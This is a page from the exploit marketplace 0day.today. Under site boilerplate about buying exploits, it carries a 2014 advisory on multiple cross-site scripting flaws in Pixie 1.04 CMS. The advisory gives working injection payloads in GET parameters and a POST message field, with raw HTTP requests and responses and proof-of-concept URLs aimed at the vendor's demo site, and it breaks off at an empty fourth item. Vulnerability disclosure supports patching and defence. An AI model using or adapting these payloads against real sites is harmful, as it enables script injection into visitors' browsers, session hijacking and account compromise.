0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pixie 1.04 CMS - Multiple XSS Vulnerabilities
#Title: Pixie 1.04 CMS - Multiple XSS #Version: 1.04 (Latest ATM) #Vendor: getpixie.co.uk #Demo: demo.getpixie.co.uk #Date: 01.26.2014 #Contact: smash[at]devilteam.pl 1. Cross Site Scripting - GET 'm' parameter Request: host/?s=login&m=forgotten" onload=alert(666) bad=" Injection point: <body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\""> PoC: demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad=" 2. Cross Site Scripting - POST message Request: POST /admin/admin/modules/ajax_message.php HTTP/1.1 Host: demo.getpixie.co.uk message=<script>alert(666)</script> Response: HTTP/1.1 200 OK Date: Sun, 26 Jan 2014 12:08:09 GMT Server: Apache X-Powered-By: PHP/5.3.28 Cache-Control: max-age=1 Expires: Sun, 26 Jan 2014 12:08:10 GMT Content-Length: 264 Keep-Alive: timeout=2 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back »</a>)</span> 3. Cross Site Scripting - GET 'x' parameter Request: host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78 Injection point: <body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\""> (...) <script type="text/javascript" src="jscript/pixie.js.php?s=login&x=page-1\" onload=alert(666) bad=\"&advmode=Toggle advanced Mode"></script> PoC: demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78 4. # 0day.today [2024-12-25] #